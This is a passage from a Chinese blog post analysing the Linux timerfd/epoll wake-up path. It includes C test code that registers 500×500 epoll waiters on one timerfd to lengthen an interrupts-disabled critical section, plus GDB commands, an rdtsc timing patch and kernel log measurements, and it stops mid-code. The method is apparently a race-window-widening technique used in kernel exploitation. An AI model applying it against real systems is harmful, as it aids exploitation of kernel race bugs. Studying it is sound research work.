**add_wait_queue(whead, &pwq->wait); <span class="comment">// whead:** &ctx->wqh</span></span><br><span class="line"> ...</span><br><span class="line"></span><br><span class="line">struct ep_pqueue {</span><br><span class="line"> poll_table pt;</span><br><span class="line"> struct epitem *epi;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">struct poll_table_struct {</span><br><span class="line"> poll_queue_proc _qproc; <span class="comment">// void (*)(struct file *, wait_queue_head_t *, struct poll_table_struct *)</span></span><br><span class="line"> <span class="keyword">__poll_t</span> _key;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">local_apic_timer_interrupt()</span><br><span class="line"> **hrtimer_interrupt()**</span><br><span class="line"> ...</span><br><span class="line"> timerfd_tmrproc()</span><br><span class="line"> **timerfd_triggered()** </span><br><span class="line"> **spin_lock_irqsave(&ctx->wqh.lock, flags);** <span class="comment">// 关中断</span></span><br><span class="line">**** ctx->expired = <span class="number">1</span>;</span><br><span class="line"> ctx->ticks++;</span><br><span class="line"> wake_up_locked_poll(**&ctx->wqh**, EPOLLIN);</span><br><span class="line"> **__wake_up_common() <span class="comment">// 遍历 wait queue, 执行 callback**</span></span><br><span class="line"> <span class="keyword">wait_queue_entry_t</span> *curr, *next;</span><br><span class="line"> **list_for_each_entry_safe_from(curr, next, &wq_head->head, entry)** </span><br><span class="line"> ret = curr->func(curr, mode, wake_flags, key); <span class="comment">// ep_poll_callback</span></span><br><span class="line"> spin_unlock_irqrestore(&ctx->wqh.lock, flags);</span><br></pre></td></tr></table></figure>
<p><code>**timerfd_tmrproc</code> 在 <code>timerfd_setup</code> 中设置**</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">timerfd_setup</span><span class="params">(struct timerfd_ctx *ctx, <span class="keyword">int</span> flags,</span></span></span><br><span class="line"><span class="function"><span class="params"> <span class="keyword">const</span> struct itimerspec64 *ktmr)</span></span></span><br><span class="line">..</span><br><span class="line"> hrtimer_init(&ctx->t.tmr, clockid, htmode);</span><br><span class="line"> hrtimer_set_expires(&ctx->t.tmr, texp);</span><br><span class="line"> ctx->t.tmr.function = timerfd_tmrproc;</span><br></pre></td></tr></table></figure>
<p><code>**struct timerfd_ctx</code>, <code>struct file</code> , <code>struct hrtimer</code> 之间的关系**</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">timerfd_ctx</span> *<span class="title">ctx</span> = <span class="title">file</span>-><span class="title">private_data</span>;</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">hrtimer</span> *<span class="title">htmr</span> = &<span class="title">ctx</span>-><span class="title">t</span>.<span class="title">tmr</span>;</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">timerfd_ctx</span> *<span class="title">ctx</span> = <span class="title">container_of</span>(<span class="title">htmr</span>, <span class="title">struct</span> <span class="title">timerfd_ctx</span>, <span class="title">t</span>.<span class="title">tmr</span>);</span></span><br></pre></td></tr></table></figure>
<p><strong>测试代码:</strong></p>
<p>向 wait queue 中添加 500 * 500 个 entry</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><fcntl.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/epoll.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/timerfd.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sched.h> </span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><err.h> </span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> SYSCHK(x) ({ \</span></span><br><span class="line"> typeof(x) __res = (x); \</span><br><span class="line"> <span class="keyword">if</span> (__res == (typeof(x))<span class="number">-1</span>) \</span><br><span class="line"> err(<span class="number">1</span>, <span class="string">"SYSCHK("</span> #x <span class="string">")"</span>); \</span><br><span class="line"> __res; \</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> NUM_EPOLL_INSTANCES 500</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> NUM_DUP_FDS 500</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> NUM_TIMER_WAITERS (NUM_EPOLL_INSTANCES * NUM_DUP_FDS)</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> NSEC_PER_SEC 1000000000UL <span class="comment">// 1s = 1000000000ns</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">pin_task_to</span><span class="params">(<span class="keyword">int</span> pid, <span class="keyword">int</span> cpu)</span> </span>{</span><br><span class="line"> <span class="keyword">cpu_set_t</span> cset;</span><br><span class="line"> CPU_ZERO(&cset);</span><br><span class="line"> CPU_SET(cpu, &cset);</span><br><span class="line"> SYSCHK(sched_setaffinity(pid, <span class="keyword">sizeof</span>(<span class="keyword">cpu_set_t</span>), &cset));</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">pin_to</span><span class="params">(<span class="keyword">int</span> cpu)</span> </span>{ pin_task_to(<span class="number">0</span>, cpu); }</span><br><span class="line"></span><br><span class="line"><span class="function">struct timespec <span class="title">get_mono_time</span><span class="params">(<span class="keyword">void</span>)</span> </span>{</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">timespec</span> <span class="title">ts</span>;</span></span><br><span class="line"> clock_gettime(CLOCK_MONOTONIC, &ts);</span><br><span class="line"> <span class="keyword">return</span> ts;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">ts_add</span><span class="params">(struct timespec *ts, <span class="keyword">unsigned</span> <span class="keyword">long</span> nsecs)</span> </span>{</span><br><span class="line"> ts->tv_nsec += nsecs;</span><br><span class="line"> <span class="keyword">if</span> (ts->tv_nsec >= NSEC_PER_SEC) {</span><br><span class="line"> ts->tv_sec++;</span><br><span class="line"> ts->tv_nsec -= NSEC_PER_SEC;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span> </span>{</span><br><span class="line"> pin_to(<span class="number">0</span>);</span><br><span class="line"> <span class="keyword">int</span> timerfd = timerfd_create(CLOCK_MONOTONIC, <span class="number">0</span>);</span><br><span class="line"> <span class="keyword">if</span> (timerfd < <span class="number">0</span>) {</span><br><span class="line"> perror(<span class="string">"timerfd_create"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 创建 epoll instances</span></span><br><span class="line"> <span class="keyword">int</span> epoll_fds[NUM_EPOLL_INSTANCES];</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < NUM_EPOLL_INSTANCES; i++) {</span><br><span class="line"> epoll_fds[i] = epoll_create1(<span class="number">0</span>);</span><br><span class="line"> <span class="keyword">if</span> (epoll_fds[i] < <span class="number">0</span>) {</span><br><span class="line"> perror(<span class="string">"epoll_create1"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// dup timer fd </span></span><br><span class="line"> <span class="keyword">int</span> timer_fds[NUM_DUP_FDS];</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < NUM_DUP_FDS; i++) {</span><br><span class="line"> timer_fds[i] = dup(timerfd);</span><br><span class="line"> <span class="keyword">if</span> (timer_fds[i] < <span class="number">0</span>) {</span><br><span class="line"> perror(<span class="string">"dup"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// epoll_ctl EPOLL_CTL_ADD 添加到 wait queue</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">epoll_event</span> <span class="title">ev</span> = {</span> <span class="number">0</span> };</span><br><span class="line"> ev.events = EPOLLIN;</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < NUM_EPOLL_INSTANCES; i++) {</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> j = <span class="number">0</span>; j < NUM_DUP_FDS; j++) {</span><br><span class="line"> ev.data.fd = timer_fds[j];</span><br><span class="line"> <span class="keyword">if</span> (epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j], &ev) < <span class="number">0</span>) {</span><br><span class="line"> perror(<span class="string">"epoll_ctl"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">timespec</span> <span class="title">base_time</span> = <span class="title">get_mono_time</span>();</span></span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">itimerspec</span> <span class="title">timer_value</span> = {</span> .it_value = base_time };</span><br><span class="line"> ts_add(&timer_value.it_value, <span class="number">1000</span> * <span class="number">1000</span> * <span class="number">1000</span>); <span class="comment">// timer at +1s</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &timer_value, <span class="literal">NULL</span>) < <span class="number">0</span>) {</span><br><span class="line"> perror(<span class="string">"timerfd_settime"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < NUM_EPOLL_INSTANCES; i++) {</span><br><span class="line"> <span class="keyword">int</span> nfds = epoll_wait(epoll_fds[i], &ev, <span class="number">1</span>, <span class="number">-1</span>);</span><br><span class="line"> <span class="keyword">if</span> (nfds < <span class="number">0</span>) {</span><br><span class="line"> perror(<span class="string">"epoll_wait"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> value;</span><br><span class="line"> <span class="built_in">read</span>(timerfd, &value, <span class="keyword">sizeof</span>(value)) == <span class="keyword">sizeof</span>(value);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"value: %ld\n"</span>, value);</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < NUM_EPOLL_INSTANCES; i++) {</span><br><span class="line"> <span class="built_in">close</span>(epoll_fds[i]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> i = <span class="number">0</span>; i < NUM_DUP_FDS; i++) {</span><br><span class="line"> <span class="built_in">close</span>(timer_fds[i]);</span><br><span class="line"> }</span><br><span class="line"> <span class="built_in">close</span>(timerfd);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><strong>如何观测延迟效果?</strong></p>
<p>在 GDB 中可以查看队列中的 entry,数量与设置的一致</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">b timerfd_triggered</span><br><span class="line"><span class="built_in">set</span> $head = &ctx.wqh.head</span><br><span class="line"><span class="built_in">set</span> $node = $head</span><br><span class="line"><span class="keyword">while</span> $node.next != $head</span><br><span class="line">p $node.next</span><br><span class="line"><span class="built_in">set</span> $node = $node.next</span><br><span class="line"><span class="built_in">end</span></span><br><span class="line">p *$head</span><br></pre></td></tr></table></figure>
<p>加一点 patch 用 <code>rdtsc</code> 可以粗略测量一下延迟效果</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">**<span class="number">0xffffffff81b8b67e</span> <+<span class="number">49</span>>: rdtsc**</span><br><span class="line"><span class="number">0xffffffff81b8b680</span> <+<span class="number">51</span>>: shl rdx,<span class="number">0x20</span></span><br><span class="line"><span class="number">0xffffffff81b8b684</span> <+<span class="number">55</span>>: <span class="keyword">or</span> rax,rdx</span><br><span class="line"><span class="number">0xffffffff81b8b687</span> <+<span class="number">58</span>>: lea r12,[rbx+<span class="number">0x88</span>]</span><br><span class="line"><span class="number">0xffffffff81b8b68e</span> <+<span class="number">65</span>>: mov r14,rax</span><br><span class="line"><span class="number">0xffffffff81b8b691</span> <+<span class="number">68</span>>: mov rdi,r12</span><br><span class="line"><span class="number">0xffffffff81b8b694</span> <+<span class="number">71</span>>: call <span class="number">0xffffffff81bde9d0</span> <_raw_spin_lock_irqsave></span><br><span class="line"><span class="number">0xffffffff81b8b699</span> <+<span class="number">76</span>>: inc QWORD PTR [rbx+<span class="number">0xa0</span>]</span><br><span class="line"><span class="number">0xffffffff81b8b6a0</span> <+<span class="number">83</span>>: mov edx,<span class="number">0x1</span></span><br><span class="line"><span class="number">0xffffffff81b8b6a5</span> <+<span class="number">88</span>>: mov rdi,r12</span><br><span class="line"><span class="number">0xffffffff81b8b6a8</span> <+<span class="number">91</span>>: mov WORD PTR [rbx+<span class="number">0xac</span>],<span class="number">0x1</span></span><br><span class="line"><span class="number">0xffffffff81b8b6b1</span> <+<span class="number">100</span>>: mov r13,rax</span><br><span class="line"><span class="number">0xffffffff81b8b6b4</span> <+<span class="number">103</span>>: mov esi,<span class="number">0x3</span></span><br><span class="line"><span class="number">0xffffffff81b8b6b9</span> <+<span class="number">108</span>>: call <span class="number">0xffffffff810ad650</span> <__wake_up_locked_key></span><br><span class="line"><span class="number">0xffffffff81b8b6be</span> <+<span class="number">113</span>>: mov rsi,r13</span><br><span class="line"><span class="number">0xffffffff81b8b6c1</span> <+<span class="number">116</span>>: mov rdi,r12</span><br><span class="line"><span class="number">0xffffffff81b8b6c4</span> <+<span class="number">119</span>>: call <span class="number">0xffffffff81bde5b0</span> <_raw_spin_unlock_irqrestore></span><br><span class="line">**<span class="number">0xffffffff81b8b6c9</span> <+<span class="number">124</span>>: rdtsc**</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">diff --git a/fs/timerfd.c b/fs/timerfd.c</span><br><span class="line">index e9c96a0c79f1..b919b24b4d48 <span class="number">100644</span></span><br><span class="line">--- a/fs/timerfd.c</span><br><span class="line">+++ b/fs/timerfd.c</span><br><span class="line">@@ <span class="number">-64</span>,<span class="number">11</span> +<span class="number">64</span>,<span class="number">20</span> @@ <span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">timerfd_triggered</span><span class="params">(struct timerfd_ctx *ctx)</span></span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">long</span> flags;</span><br><span class="line"></span><br><span class="line">+ u64 start_time, end_time;</span><br><span class="line">+</span><br><span class="line">+ pr_warn(<span class="string">"[%s] %s enter\n"</span>, current->comm, __func__);</span><br><span class="line">+</span><br><span class="line">+ <span class="function"><span class="keyword">asm</span> <span class="title">volatile</span> <span class="params">(<span class="string">"rdtsc; shlq $32, %%rdx; orq %%rdx, %0"</span></span></span></span><br><span class="line"><span class="function"><span class="params">+ : <span class="string">"=a"</span>(start_time) :: <span class="string">"%rdx"</span>)</span></span>;</span><br><span class="line"> spin_lock_irqsave(&ctx->wqh.lock, flags);</span><br><span class="line"> ctx->expired = <span class="number">1</span>;</span><br><span class="line"> ctx->ticks++;</span><br><span class="line"> wake_up_locked_poll(&ctx->wqh, EPOLLIN);</span><br><span class="line"> spin_unlock_irqrestore(&ctx->wqh.lock, flags);</span><br><span class="line">+ <span class="function"><span class="keyword">asm</span> <span class="title">volatile</span> <span class="params">(<span class="string">"rdtsc; shlq $32, %%rdx; orq %%rdx, %0"</span></span></span></span><br><span class="line"><span class="function"><span class="params">+ : <span class="string">"=a"</span>(end_time) :: <span class="string">"%rdx"</span>)</span></span>;</span><br><span class="line">+ pr_warn(<span class="string">"[%s] %s exit, %lld\n"</span>, current->comm, __func__, end_time - start_time);</span><br><span class="line"> }</span><br></pre></td></tr></table></figure>
<p>系统正常运行的时候 tick 数大概在 3000 ~ 30000, 创建 500 * 500 个 entry 可以使cpu 运行时间增大 3~4 个数量级(测试虚拟机的CPU是单核 2000 MHz)</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">[ <span class="number">1134.053250</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">2976</span></span><br><span class="line">[ <span class="number">1134.053250</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1134.053250</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">3970</span></span><br><span class="line">[ <span class="number">1134.552271</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1134.552906</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">11616</span></span><br><span class="line">[ <span class="number">1175.552958</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1175.553871</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">32663</span></span><br><span class="line">[ <span class="number">1176.052796</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">[ <span class="number">1176.053719</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">29340</span></span><br><span class="line">[ <span class="number">1184.738834</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">**[ <span class="number">1184.739757</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">27116541</span> <span class="comment">// 500 * 500</span></span><br><span class="line">...**</span><br><span class="line">[ <span class="number">1588.076916</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">**[ <span class="number">1588.077841</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">28924883</span> <span class="comment">// 500 * 500</span></span><br><span class="line">...**</span><br><span class="line">[ <span class="number">1596.735608</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">**[ <span class="number">1596.736503</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">28029898</span> <span class="comment">// 500 * 500**</span></span><br><span class="line">..</span><br><span class="line">[ <span class="number">1222.384483</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">**[ <span class="number">1222.385381</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">8511668</span> <span class="comment">// 100 * 500**</span></span><br><span class="line">...</span><br><span class="line">[ <span class="number">1265.026284</span>] [swapper/<span class="number">0</span>] timerfd_triggered enter</span><br><span class="line">**[ <span class="number">1265.027208</span>] [swapper/<span class="number">0</span>] timerfd_triggered <span class="built_in">exit</span>, <span class="number">1202548</span> <span class="comment">// 10 * 500**</span></span><br></pre></td></tr></table></figure>
<h3 id="一种观测代码被中断位置的方法"><a href="#一种观测代码被中断位置的方法" class="headerlink" title="一种观测代码被中断位置的方法"></a>一种观测代码被中断位置的方法</h3><p>原文的附录:</p>
<blockquote>
<p>I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register</p>
</blockquote>
<p>代码实现:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><signal.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><ucontext.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/time.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/user.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><time.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sched.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><err.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> SYSCHK(x) ({ \</span></span><br><span class="line"> typeof(x) __res = (x); \</span><br><span class="line"> <span class="keyword">if</span> (__res == (typeof(x))<span class="number">-1</span>) \</span><br><span class="line"> err(<span class="number">1</span>, <span class="string">"SYSCHK("</span> #x <span class="string">")"</span>); \</span><br><span class="line"> __res; \</span><br><span class="line">})</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">pin_task_to</span><span class="params">(<span class="keyword">int</span> pid, <span class="keyword">int</span> cpu)</span> </span>{</span><br><span class="line"> <span class="keyword">cpu_set_t</span> cset;</span><br><span class="line"> CPU_ZERO(&cset);</span><br><span class="line"> CPU_SET(cpu, &cset);</span><br><span class="line"> SYSCHK(sched_setaffinity(pid, <span class="keyword">sizeof</span>(<span class="keyword">cpu_set_t</span>), &cset));</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">pin_to</span><span class="params">(<span class="keyword">int</span> cpu)</span> </span>{ pin_task_to(<span class="number">0</span>, cpu); }</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">timer_handler</span><span class="params">(<span class="keyword">int</span> signum, <span class="keyword">siginfo_t</span> *info, <span class="keyword">void</span> *context)</span> </span>{</span><br><span class="line"> <span class="keyword">ucontext_t</span> *ucontext = (<span class="keyword">ucontext_t</span> *) context;</span><br><span class="line"> <span class="keyword">void</span> *pc = (<span class="keyword">void</span> *) ucontext->uc_mcontext.gregs[REG_RIP];</span><br><span class="line"> <span 